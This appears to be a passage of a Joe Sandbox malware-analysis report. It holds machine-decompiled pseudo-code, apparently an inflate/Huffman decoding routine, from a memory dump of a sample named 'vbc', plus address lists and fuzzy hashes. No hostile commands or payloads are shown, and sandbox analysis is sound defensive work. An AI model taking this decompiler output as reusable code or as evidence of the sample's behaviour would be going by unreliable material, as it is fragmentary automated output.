                                                												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                												__esi[2] = __esi[2] + 1;
                                                											}
                                                											L94:
                                                											__eax = __esi[1];
                                                											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                											__edi = __eax;
                                                											__eax = __eax >> 5;
                                                											__edi = __edi & 0x0000001f;
                                                											__ecx = 0x101;
                                                											__eax = __eax & 0x0000001f;
                                                											__edi = __edi + 0x101;
                                                											__eax = __eax + 1;
                                                											__edx = __ebp - 0xc;
                                                											 *(__ebp - 0x14) = __eax;
                                                											 &(__esi[0x148]) = __ebp - 4;
                                                											 *(__ebp - 4) = 9;
                                                											__ebp - 0x18 =  &(__esi[3]);
                                                											 *(__ebp - 0x10) = 6;
                                                											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                											__eflags =  *(__ebp - 4);
                                                											if( *(__ebp - 4) == 0) {
                                                												__eax = __eax | 0xffffffff;
                                                												__eflags = __eax;
                                                											}
                                                											__eflags = __eax;
                                                											if(__eax != 0) {
                                                												goto L9;
                                                											} else {
                                                												L97:
                                                												__ebp - 0xc =  &(__esi[0x148]);
                                                												__ebp - 0x10 = __ebp - 0x1c;
                                                												__eax = __esi + 0xc + __edi * 4;
                                                												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                												__eflags = __eax;
                                                												if(__eax != 0) {
                                                													goto L9;
                                                												}
                                                												L98:
                                                												__eax =  *(__ebp - 0x10);
                                                												__eflags =  *(__ebp - 0x10);
                                                												if( *(__ebp - 0x10) != 0) {
                                                													L100:
                                                													__cl =  *(__ebp - 4);
                                                													 *__esi =  *__esi & 0x00000000;
                                                													__eflags =  *__esi;
                                                													__esi[4] = __al;
                                                													__eax =  *(__ebp - 0x18);
                                                													__esi[5] =  *(__ebp - 0x18);
                                                													__eax =  *(__ebp - 0x1c);
                                                													__esi[4] = __cl;
                                                													__esi[6] =  *(__ebp - 0x1c);
                                                													goto L101;
                                                												}
                                                												L99:
                                                												__eflags = __edi - 0x101;
                                                												if(__edi > 0x101) {
                                                													goto L9;
                                                												}
                                                												goto L100;
                                                											}
                                                										case 0xe:
                                                											goto L9;
                                                										case 0xf:
                                                											L175:
                                                											__eax =  *(__ebp - 0x30);
                                                											__esi[0x26ea] =  *(__ebp - 0x30);
                                                											__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                											__ecx = __esi[0x26ea];
                                                											__edx = __esi[0x26e9];
                                                											__eflags = __ecx - __edx;
                                                											 *(__ebp - 0x30) = __ecx;
                                                											if(__ecx >= __edx) {
                                                												__eax = __esi[0x26e8];
                                                												__eax = __esi[0x26e8] - __ecx;
                                                												__eflags = __eax;
                                                											} else {
                                                												__edx = __edx - __ecx;
                                                												__eax = __edx - __ecx - 1;
                                                											}
                                                											__eflags = __ecx - __edx;
                                                											 *(__ebp - 0x2c) = __eax;
                                                											if(__ecx != __edx) {
                                                												L183:
                                                												__edi = 0;
                                                												goto L10;
                                                											} else {
                                                												L179:
                                                												__eax = __esi[0x145];
                                                												__eflags = __eax - 8;
                                                												 *__esi = __eax;
                                                												if(__eax != 8) {
                                                													L184:
                                                													0 = 1;
                                                													goto L10;
                                                												}
                                                												goto L180;
                                                											}
                                                									}
                                                								}
                                                								L181:
                                                								goto L9;
                                                							}
                                                							L70:
                                                							if( *__edi == __eax) {
                                                								goto L72;
                                                							}
                                                							L71:
                                                							__esi[2] = __esi[2] & __eax;
                                                							 *__esi = 0xd;
                                                							goto L93;
                                                						}
                                                					}
                                                				}
                                                				L182:
                                                				_t443 = 0;
                                                				_t446[0x147] =  *(_t448 - 0x40);
                                                				_t446[0x146] = _t425;
                                                				( *(_t448 + 8))[1] = 0;
                                                				goto L11;
                                                			}









                                                0x00406d85
                                                0x00406d85
                                                0x00406d85
                                                0x00406d85
                                                0x00406d85
                                                0x00406d89
                                                0x00000000
                                                0x00000000
                                                0x00406d8f
                                                0x00406d8f
                                                0x00406d92
                                                0x00406d95
                                                0x00406d9a
                                                0x00406d9c
                                                0x00406d9f
                                                0x00406da2
                                                0x00406da5
                                                0x00406da5
                                                0x00406da8
                                                0x00000000
                                                0x00000000
                                                0x00406daa
                                                0x00406daa
                                                0x00406dad
                                                0x00406db2
                                                0x00406db4
                                                0x00406db7
                                                0x00406dbd
                                                0x00406b1c
                                                0x00406b1c
                                                0x00406b1f
                                                0x00406b25
                                                0x00406b2b
                                                0x00406b34
                                                0x00406b3a
                                                0x00406b3d
                                                0x00406b44
                                                0x00406b49
                                                0x00406b4f
                                                0x00406b5a
                                                0x00406b5a
                                                0x00406dc3
                                                0x00406dc3
                                                0x00406dcd
                                                0x00000000
                                                0x00000000
                                                0x00406dd3
                                                0x00406dd3
                                                0x00406dd7
                                                0x00406dda
                                                0x00406dda
                                                0x00406dde
                                                0x00406de4
                                                0x00406de4
                                                0x00406de7
                                                0x00406dea
                                                0x00406df0
                                                0x00000000
                                                0x00000000
                                                0x00406df2
                                                0x00406e14
                                                0x00406e14
                                                0x00406e17
                                                0x00000000
                                                0x00000000
                                                0x00406df4
                                                0x00406df8
                                                0x00000000
                                                0x00000000
                                                0x00406dfe
                                                0x00406dfe
                                                0x00406e01
                                                0x00406e04
                                                0x00406e09
                                                0x00406e0b
                                                0x00406e0e
                                                0x00406e11
                                                0x00406e11
                                                0x00406e19
                                                0x00406e19
                                                0x00406e1f
                                                0x00406e22
                                                0x00406e25
                                                0x00406e25
                                                0x00406e2c
                                                0x00406e30
                                                0x00406e34
                                                0x00406e37
                                                0x00406e3a
                                                0x00406e40
                                                0x00406e45
                                                0x00000000
                                                0x00000000
                                                0x00406e47
                                                0x00406e5b
                                                0x00406e5b
                                                0x00406e5f
                                                0x00000000
                                                0x00000000
                                                0x00406e49
                                                0x00406e4c
                                                0x00406e4c
                                                0x00406e53
                                                0x00406e58
                                                0x00406e58
                                                0x00406e58
                                                0x00406e61
                                                0x00406e61
                                                0x00406e64
                                                0x00406e72
                                                0x00406e78
                                                0x00406e7d
                                                0x00406e83
                                                0x00406e89
                                                0x00406e8f
                                                0x00406e96
                                                0x00406eaa
                                                0x00406eaa
                                                0x00407479
                                                0x00407479
                                                0x00407479
                                                0x0040747e
                                                0x00000000
                                                0x00000000
                                                0x00406ab6
                                                0x00406ab6
                                                0x00000000
                                                0x004070b1
                                                0x004070b1
                                                0x004070b5
                                                0x004070b8
                                                0x004070bb
                                                0x004070be
                                                0x00000000
                                                0x00000000
                                                0x004070c4
                                                0x004070c4
                                                0x004070e9
                                                0x004070e9
                                                0x004070e9
                                                0x004070eb
                                                0x00000000
                                                0x00000000
                                                0x004070c9
                                                0x004070c9
                                                0x004070cd
                                                0x00000000
                                                0x00000000
                                                0x004070d3
                                                0x004070d3
                                                0x004070d6
                                                0x004070d9
                                                0x004070dc
                                                0x004070de
                                                0x004070e0
                                                0x004070e3
                                                0x004070e6
                                                0x004070e6
                                                0x004070e6
                                                0x004070ed
                                                0x004070ed
                                                0x004070f5
                                                0x004070f8
                                                0x004070fb
                                                0x004070fe
                                                0x00407102
                                                0x00407105
                                                0x00407107
                                                0x0040710a
                                                0x0040710c
                                                0x00407120
                                                0x00407120
                                                0x00407123
                                                0x0040713d
                                                0x0040713d
                                                0x00407140
                                                0x00000000
                                                0x00000000
                                                0x00407146
                                                0x00407146
                                                0x00407149
                                                0x00000000
                                                0x00000000
                                                0x0040714f
                                                0x0040714f
                                                0x00000000
                                                0x0040714f
                                                0x00407125
                                                0x00407128
                                                0x0040712f
                                                0x00407132
                                                0x00000000
                                                0x00407132
                                                0x0040710e
                                                0x00407112
                                                0x00407115
                                                0x00000000
                                                0x00000000
                                                0x0040715a
                                                0x0040715a
                                                0x0040717f
                                                0x0040717f
                                                0x0040717f
                                                0x00407181
                                                0x00000000
                                                0x00000000
                                                0x0040715f
                                                0x0040715f
                                                0x00407163
                                                0x00000000
                                                0x00000000
                                                0x00407169
                                                0x00407169
                                                0x0040716c
                                                0x0040716f
                                                0x00407172
                                                0x00407174
                                                0x00407176
                                                0x00407179
                                                0x0040717c
                                                0x0040717c
                                                0x0040717c
                                                0x00407183
                                                0x0040718b
                                                0x0040718e
                                                0x00407191
                                                0x00407193
                                                0x00407196
                                                0x00407196
                                                0x00407198
                                                0x0040719c
                                                0x0040719f
                                                0x004071a2
                                                0x004071a5
                                                0x00000000
                                                0x00000000
                                                0x004071ab
                                                0x004071ab
                                                0x004071d0
                                                0x004071d0
                                                0x004071d0
                                                0x004071d2
                                                0x00000000
                                                0x00000000
                                                0x004071b0
                                                0x004071b0
                                                0x004071b4
                                                0x00000000
                                                0x00000000
                                                0x004071ba
                                                0x004071ba
                                                0x004071bd
                                                0x004071c0
                                                0x004071c3
                                                0x004071c5
                                                0x004071c7
                                                0x004071ca
                                                0x004071cd
                                                0x004071cd
                                                0x004071cd
                                                0x004071d4
                                                0x004071d4
                                                0x004071dc
                                                0x004071df
                                                0x004071e2
                                                0x004071e5
                                                0x004071e9
                                                0x004071ec
                                                0x004071ee
                                                0x004071f1
                                                0x004071f4
                                                0x0040720e
                                                0x0040720e
                                                0x00407211
                                                0x00000000
                                                0x00000000
                                                0x00407217
                                                0x00407217
                                                0x0040721a
                                                0x00407221
                                                0x00000000
                                                0x00407221
                                                0x004071f6
                                                0x004071f9
                                                0x00407200
                                                0x00407203
                                                0x00000000
                                                0x00000000
                                                0x00407229
                                                0x00407229
                                                0x0040724e
                                                0x0040724e
                                                0x0040724e
                                                0x00407250
                                                0x00000000
                                                0x00000000
                                                0x0040722e
                                                0x0040722e
                                                0x00407232
                                                0x00000000
                                                0x00000000
                                                0x00407238
                                                0x00407238
                                                0x0040723b
                                                0x0040723e
                                                0x00407241
                                                0x00407243
                                                0x00407245
                                                0x00407248
                                                0x0040724b
                                                0x0040724b
                                                0x0040724b
                                                0x00407252
                                                0x0040725a
                                                0x0040725d
                                                0x00407260
                                                0x00407262
                                                0x00407265
                                                0x00407265
                                                0x00407267
                                                0x00000000
                                                0x00000000
                                                0x0040726d
                                                0x0040726d
                                                0x00407270
                                                0x00407275
                                                0x00407277
                                                0x0040727d
                                                0x0040727f
                                                0x00407294
                                                0x00407296
                                                0x00407296
                                                0x00407281
                                                0x00407287
                                                0x00407289
                                                0x0040728b
                                                0x0040728b
                                                0x00407298
                                                0x0040729c
                                                0x0040729f
                                                0x004072a5
                                                0x004072a5
                                                0x004072a8
                                                0x004072a8
                                                0x004072a8
                                                0x004072aa
                                                0x00000000
                                                0x00000000
                                                0x004072b0
                                                0x004072b0
                                                0x004072b6
                                                0x004072b8
                                                0x004072dd
                                                0x004072e0
                                                0x004072e6
                                                0x004072eb
                                                0x004072f1
                                                0x004072f7
                                                0x004072f9
                                                0x004072fc
                                                0x00407305
                                                0x0040730b
                                                0x0040730b
                                                0x004072fe
                                                0x00407300
                                                0x00407302
                                                0x00407302
                                                0x0040730d
                                                0x00407313
                                                0x00407315
                                                0x00407318
                                                0x0040731a
                                                0x00407320
                                                0x00407322
                                                0x00407324
                                                0x00407326
                                                0x00407328
                                                0x0040732b
                                                0x00407334
                                                0x00407337
                                                0x00407337
                                                0x0040732d
                                                0x0040732d
                                                0x00407330
                                                0x00407330
                                                0x0040732b
                                                0x00407322
                                                0x00407339
                                                0x0040733b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040733b
                                                0x004072ba
                                                0x004072ba
                                                0x004072c0
                                                0x004072c6
                                                0x004072c8
                                                0x00000000
                                                0x00000000
                                                0x004072ca
                                                0x004072ca
                                                0x004072cc
                                                0x004072ce
                                                0x004072d7
                                                0x004072d7
                                                0x004072d0
                                                0x004072d0
                                                0x004072d3
                                                0x004072d3
                                                0x004072d9
                                                0x004072db
                                                0x00000000
                                                0x00000000
                                                0x00407341
                                                0x00407341
                                                0x00407346
                                                0x00407348
                                                0x00407349
                                                0x0040734a
                                                0x0040734b
                                                0x00407351
                                                0x00407354
                                                0x00407357
                                                0x0040735a
                                                0x0040735c
                                                0x00407362
                                                0x00407362
                                                0x00407365
                                                0x00407365
                                                0x00407365
                                                0x00407365
                                                0x0040736e
                                                0x00000000
                                                0x00000000
                                                0x00407373
                                                0x00407373
                                                0x00407376
                                                0x00407379
                                                0x0040737b
                                                0x00407412
                                                0x00407412
                                                0x00407415
                                                0x00407417
                                                0x00407418
                                                0x00407419
                                                0x0040741c
                                                0x00000000
                                                0x0040741c
                                                0x00407381
                                                0x00407381
                                                0x00407387
                                                0x00407389
                                                0x004073ae
                                                0x004073b1
                                                0x004073b7
                                                0x004073bc
                                                0x004073c2
                                                0x004073c8
                                                0x004073ca
                                                0x004073cd
                                                0x004073d6
                                                0x004073dc
                                                0x004073dc
                                                0x004073cf
                                                0x004073d1
                                                0x004073d3
                                                0x004073d3
                                                0x004073de
                                                0x004073e4
                                                0x004073e6
                                                0x004073e9
                                                0x004073eb
                                                0x004073f1
                                                0x004073f3
                                                0x004073f5
                                                0x004073f7
                                                0x004073f9
                                                0x004073fc
                                                0x00407405
                                                0x00407408
                                                0x00407408
                                                0x004073fe
                                                0x004073fe
                                                0x00407401
                                                0x00407401
                                                0x004073fc
                                                0x004073f3
                                                0x0040740a
                                                0x0040740c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040740c
                                                0x0040738b
                                                0x0040738b
                                                0x00407391
                                                0x00407397
                                                0x00407399
                                                0x00000000
                                                0x00000000
                                                0x0040739b
                                                0x0040739b
                                                0x0040739d
                                                0x0040739f
                                                0x004073a6
                                                0x004073a6
                                                0x004073a8
                                                0x004073a1
                                                0x004073a1
                                                0x004073a3
                                                0x004073a3
                                                0x004073aa
                                                0x004073ac
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407424
                                                0x00407424
                                                0x00407427
                                                0x00407429
                                                0x0040742c
                                                0x0040742f
                                                0x0040742f
                                                0x0040742f
                                                0x0040742f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406add
                                                0x00406ac1
                                                0x00000000
                                                0x00406ac7
                                                0x00406aca
                                                0x00406ad4
                                                0x00406ad7
                                                0x00406ada
                                                0x00000000
                                                0x00406ada
                                                0x00406ac1
                                                0x00406ae5
                                                0x00406ae8
                                                0x00406aec
                                                0x00406af6
                                                0x00406b00
                                                0x00406b03
                                                0x00406b09
                                                0x00406c3d
                                                0x00406c3f
                                                0x00406c45
                                                0x00406c48
                                                0x00406c4b
                                                0x00000000
                                                0x00406c4b
                                                0x00406b0f
                                                0x00406b0f
                                                0x00406b10
                                                0x00406b68
                                                0x00406b68
                                                0x00406b6f
                                                0x00406c15
                                                0x00406c15
                                                0x00406c1a
                                                0x00406c1d
                                                0x00406c22
                                                0x00406c25
                                                0x00406c2a
                                                0x00406c2d
                                                0x00406c32
                                                0x00406c35
                                                0x00406c35
                                                0x00000000
                                                0x00406b75
                                                0x00406b75
                                                0x00406b75
                                                0x00406b75
                                                0x00406b79
                                                0x00406b79
                                                0x00406b9b
                                                0x00406b9e
                                                0x00406ba0
                                                0x00406ba3
                                                0x00406ba8
                                                0x00406b7e
                                                0x00406b7e
                                                0x00406b83
                                                0x00406b85
                                                0x00406b87
                                                0x00406b8c
                                                0x00406b92
                                                0x00406b97
                                                0x00406b99
                                                0x00406b99
                                                0x00406b8e
                                                0x00406b8e
                                                0x00406b8e
                                                0x00406b8c
                                                0x00000000
                                                0x00406baa
                                                0x00406bd7
                                                0x00406bdc
                                                0x00406bde
                                                0x00406bdf
                                                0x00406be1
                                                0x00406be2
                                                0x00406be2
                                                0x00406be2
                                                0x00406c0a
                                                0x00406c0f
                                                0x00406c0f
                                                0x00000000
                                                0x00406c0f
                                                0x00406ba8
                                                0x00406b6f
                                                0x00406b12
                                                0x00406b12
                                                0x00406b13
                                                0x00406b5d
                                                0x00000000
                                                0x00406b5d
                                                0x00406b15
                                                0x00406b16
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406c72
                                                0x00406c72
                                                0x00406c72
                                                0x00406c75
                                                0x00000000
                                                0x00000000
                                                0x00406c52
                                                0x00406c52
                                                0x00406c56
                                                0x00000000
                                                0x00000000
                                                0x00406c5c
                                                0x00406c5c
                                                0x00406c5f
                                                0x00406c62
                                                0x00406c67
                                                0x00406c69
                                                0x00406c6c
                                                0x00406c6f
                                                0x00406c6f
                                                0x00406c6f
                                                0x00406c77
                                                0x00406c77
                                                0x00406c7a
                                                0x00406c7c
                                                0x00406c81
                                                0x00406c84
                                                0x00406c86
                                                0x00406c89
                                                0x00000000
                                                0x00000000
                                                0x00406c8f
                                                0x00406c8f
                                                0x00406c91
                                                0x00000000
                                                0x00000000
                                                0x00406c97
                                                0x00406c97
                                                0x00406c9b
                                                0x00000000
                                                0x00000000
                                                0x00406ca1
                                                0x00406ca1
                                                0x00406ca4
                                                0x00406ca6
                                                0x00406d44
                                                0x00406d44
                                                0x00406d47
                                                0x00406d49
                                                0x00406d49
                                                0x00406d4c
                                                0x00406d4f
                                                0x00406d51
                                                0x00406d53
                                                0x00406d55
                                                0x00406d55
                                                0x00406d5e
                                                0x00406d63
                                                0x00406d66
                                                0x00406d69
                                                0x00406d6c
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d72
                                                0x00406d78
                                                0x00406d78
                                                0x00406d7e
                                                0x00406d7e
                                                0x00406d7e
                                                0x00000000
                                                0x00406d72
                                                0x00406cac
                                                0x00406cac
                                                0x00406cb2
                                                0x00406cb5
                                                0x00406cb7
                                                0x00406ce2
                                                0x00406ce5
                                                0x00406ceb
                                                0x00406cf0
                                                0x00406cf6
                                                0x00406cfc
                                                0x00406cfe
                                                0x00406d01
                                                0x00406d0a
                                                0x00406d10
                                                0x00406d10
                                                0x00406d03
                                                0x00406d05
                                                0x00406d07
                                                0x00406d07
                                                0x00406d12
                                                0x00406d18
                                                0x00406d1b
                                                0x00406d1d
                                                0x00406d1f
                                                0x00406d25
                                                0x00406d27
                                                0x00406d29
                                                0x00406d2c
                                                0x00406d35
                                                0x00406d35
                                                0x00406d37
                                                0x00406d2e
                                                0x00406d2e
                                                0x00406d31
                                                0x00406d31
                                                0x00406d39
                                                0x00406d39
                                                0x00406d27
                                                0x00406d3c
                                                0x00406d3e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406d3e
                                                0x00406cb9
                                                0x00406cb9
                                                0x00406cbf
                                                0x00406cc5
                                                0x00406cc7
                                                0x00000000
                                                0x00000000
                                                0x00406cc9
                                                0x00406cc9
                                                0x00406ccb
                                                0x00406ccd
                                                0x00406cd0
                                                0x00406cd7
                                                0x00406cd7
                                                0x00406cd9
                                                0x00406cd2
                                                0x00406cd2
                                                0x00406cd4
                                                0x00406cd4
                                                0x00406cdb
                                                0x00406cdd
                                                0x00406ce0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406de4
                                                0x00406de7
                                                0x00406dea
                                                0x00406df0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406fc7
                                                0x00406fc7
                                                0x00406fc7
                                                0x00406fca
                                                0x00406fcd
                                                0x00406fcf
                                                0x00406fd2
                                                0x00406fd8
                                                0x00406fdf
                                                0x00406fe1
                                                0x00000000
                                                0x00000000
                                                0x00406eb5
                                                0x00406eb5
                                                0x00406edd
                                                0x00406edd
                                                0x00406edd
                                                0x00406edf
                                                0x00000000
                                                0x00000000
                                                0x00406ebd
                                                0x00406ebd
                                                0x00406ec1
                                                0x00000000
                                                0x00000000
                                                0x00406ec7
                                                0x00406ec7
                                                0x00406eca
                                                0x00406ecd
                                                0x00406ed0
                                                0x00406ed2
                                                0x00406ed4
                                                0x00406ed7
                                                0x00406eda
                                                0x00406eda
                                                0x00406eda
                                                0x00406ee1
                                                0x00406ee1
                                                0x00406ee9
                                                0x00406eec
                                                0x00406ef2
                                                0x00406ef5
                                                0x00406ef9
                                                0x00406efd
                                                0x00406f00
                                                0x00406f03
                                                0x00406f1b
                                                0x00406f1b
                                                0x00406f1e
                                                0x00406f2c
                                                0x00406f2f
                                                0x00406f20
                                                0x00406f20
                                                0x00406f22
                                                0x00406f29
                                                0x00406f29
                                                0x00406f58
                                                0x00406f58
                                                0x00406f58
                                                0x00406f5b
                                                0x00406f5d
                                                0x00000000
                                                0x00000000
                                                0x00406f38
                                                0x00406f38
                                                0x00406f3c
                                                0x00000000
                                                0x00000000
                                                0x00406f42
                                                0x00406f42
                                                0x00406f45
                                                0x00406f48
                                                0x00406f4b
                                                0x00406f4d
                                                0x00406f4f
                                                0x00406f52
                                                0x00406f55
                                                0x00406f55
                                                0x00406f55
                                                0x00406f5f
                                                0x00406f5f
                                                0x00406f61
                                                0x00406f63
                                                0x00406f6e
                                                0x00406f71
                                                0x00406f74
                                                0x00406f76
                                                0x00406f78
                                                0x00406f7a
                                                0x00406f7d
                                                0x00406f80
                                                0x00406f85
                                                0x00406f88
                                                0x00406f8b
                                                0x00406f8e
                                                0x00406f95
                                                0x00406f98
                                                0x00406f9a
                                                0x00000000
                                                0x00000000
                                                0x00406fa0
                                                0x00406fa0
                                                0x00406fa4
                                                0x00406fb5
                                                0x00406fb5
                                                0x00406fb5
                                                0x00406fb7
                                                0x00406fb7
                                                0x00406fbb
                                                0x00406fbb
                                                0x00406fbb
                                                0x00406fbd
                                                0x00406fbe
                                                0x00406fc1
                                                0x00406fc1
                                                0x00406fc1
                                                0x00406fc4
                                                0x00000000
                                                0x00406fc4
                                                0x00406fa6
                                                0x00406fa6
                                                0x00406fa9
                                                0x00000000
                                                0x00000000
                                                0x00406faf
                                                0x00406faf
                                                0x00000000
                                                0x00406faf
                                                0x00406f05
                                                0x00406f05
                                                0x00406f07
                                                0x00406f09
                                                0x00406f0c
                                                0x00406f0f
                                                0x00406f13
                                                0x00406f13
                                                0x00406fe7
                                                0x00406fe7
                                                0x00406fea
                                                0x00406ff1
                                                0x00406ff5
                                                0x00406ff7
                                                0x00406ffa
                                                0x00406ffd
                                                0x00407002
                                                0x00407005
                                                0x00407007
                                                0x00407008
                                                0x0040700b
                                                0x00407016
                                                0x00407019
                                                0x00407030
                                                0x00407035
                                                0x0040703c
                                                0x00407041
                                                0x00407045
                                                0x00407047
                                                0x00407047
                                                0x00407047
                                                0x0040704a
                                                0x0040704c
                                                0x00000000
                                                0x00407052
                                                0x00407052
                                                0x00407056
                                                0x00407061
                                                0x00407074
                                                0x00407079
                                                0x0040707e
                                                0x00407080
                                                0x00000000
                                                0x00000000
                                                0x00407086
                                                0x00407086
                                                0x00407089
                                                0x0040708b
                                                0x00407099
                                                0x00407099
                                                0x0040709c
                                                0x0040709c
                                                0x0040709f
                                                0x004070a2
                                                0x004070a5
                                                0x004070a8
                                                0x004070ab
                                                0x004070ae
                                                0x00000000
                                                0x004070ae
                                                0x0040708d
                                                0x0040708d
                                                0x00407093
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407093
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407432
                                                0x00407432
                                                0x00407438
                                                0x0040743e
                                                0x00407443
                                                0x00407449
                                                0x0040744f
                                                0x00407451
                                                0x00407454
                                                0x0040745d
                                                0x00407463
                                                0x00407463
                                                0x00407456
                                                0x00407458
                                                0x0040745a
                                                0x0040745a
                                                0x00407465
                                                0x00407467
                                                0x0040746a
                                                0x004074a5
                                                0x004074a5
                                                0x00000000
                                                0x0040746c
                                                0x0040746c
                                                0x0040746c
                                                0x00407472
                                                0x00407475
                                                0x00407477
                                                0x004074ac
                                                0x004074ae
                                                0x00000000
                                                0x004074ae
                                                0x00000000
                                                0x00407477
                                                0x00000000
                                                0x00406ab6
                                                0x00407484
                                                0x00000000
                                                0x00407484
                                                0x00406e98
                                                0x00406e9a
                                                0x00000000
                                                0x00000000
                                                0x00406e9c
                                                0x00406e9c
                                                0x00406e9f
                                                0x00000000
                                                0x00406e9f
                                                0x00406de4
                                                0x00406da5
                                                0x00407489
                                                0x0040748c
                                                0x0040748e
                                                0x00407497
                                                0x0040749d
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                                                • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                				signed int _v8;
                                                				unsigned int _v12;
                                                				signed int _v16;
                                                				intOrPtr _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				intOrPtr* _v32;
                                                				signed int* _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				intOrPtr _v48;
                                                				intOrPtr _v52;
                                                				void _v116;
                                                				signed int _v176;
                                                				signed int _v180;
                                                				signed int _v240;
                                                				signed int _t166;
                                                				signed int _t168;
                                                				intOrPtr _t175;
                                                				signed int _t181;
                                                				void* _t182;
                                                				intOrPtr _t183;
                                                				signed int* _t184;
                                                				signed int _t186;
                                                				signed int _t187;
                                                				signed int* _t189;
                                                				signed int _t190;
                                                				intOrPtr* _t191;
                                                				intOrPtr _t192;
                                                				signed int _t193;
                                                				signed int _t195;
                                                				signed int _t200;
                                                				signed int _t205;
                                                				void* _t207;
                                                				short _t208;
                                                				signed char _t222;
                                                				signed int _t224;
                                                				signed int _t225;
                                                				signed int* _t232;
                                                				signed int _t233;
                                                				signed int _t234;
                                                				void* _t235;
                                                				signed int _t236;
                                                				signed int _t244;
                                                				signed int _t246;
                                                				signed int _t251;
                                                				signed int _t254;
                                                				signed int _t256;
                                                				signed int _t259;
                                                				signed int _t262;
                                                				void* _t263;
                                                				void* _t264;
                                                				signed int _t267;
                                                				intOrPtr _t269;
                                                				intOrPtr _t271;
                                                				signed int _t274;
                                                				intOrPtr* _t275;
                                                				unsigned int _t276;
                                                				void* _t277;
                                                				signed int _t278;
                                                				intOrPtr* _t279;
                                                				signed int _t281;
                                                				intOrPtr _t282;
                                                				intOrPtr _t283;
                                                				signed int* _t284;
                                                				signed int _t286;
                                                				signed int _t287;
                                                				signed int _t288;
                                                				signed int _t296;
                                                				signed int* _t297;
                                                				intOrPtr _t298;
                                                				void* _t299;
                                                
                                                				_t278 = _a8;
                                                				_t187 = 0x10;
                                                				memset( &_v116, 0, _t187 << 2);
                                                				_t189 = _a4;
                                                				_t233 = _t278;
                                                				do {
                                                					_t166 =  *_t189;
                                                					_t189 =  &(_t189[1]);
                                                					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                					_t233 = _t233 - 1;
                                                				} while (_t233 != 0);
                                                				if(_v116 != _t278) {
                                                					_t279 = _a28;
                                                					_t267 =  *_t279;
                                                					_t190 = 1;
                                                					_a28 = _t267;
                                                					_t234 = 0xf;
                                                					while(1) {
                                                						_t168 = 0;
                                                						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                							break;
                                                						}
                                                						_t190 = _t190 + 1;
                                                						if(_t190 <= _t234) {
                                                							continue;
                                                						}
                                                						break;
                                                					}
                                                					_v8 = _t190;
                                                					if(_t267 < _t190) {
                                                						_a28 = _t190;
                                                					}
                                                					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                						_t234 = _t234 - 1;
                                                						if(_t234 != 0) {
                                                							continue;
                                                						}
                                                						break;
                                                					}
                                                					_v28 = _t234;
                                                					if(_a28 > _t234) {
                                                						_a28 = _t234;
                                                					}
                                                					 *_t279 = _a28;
                                                					_t181 = 1 << _t190;
                                                					while(_t190 < _t234) {
                                                						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                						if(_t182 < 0) {
                                                							L64:
                                                							return _t168 | 0xffffffff;
                                                						}
                                                						_t190 = _t190 + 1;
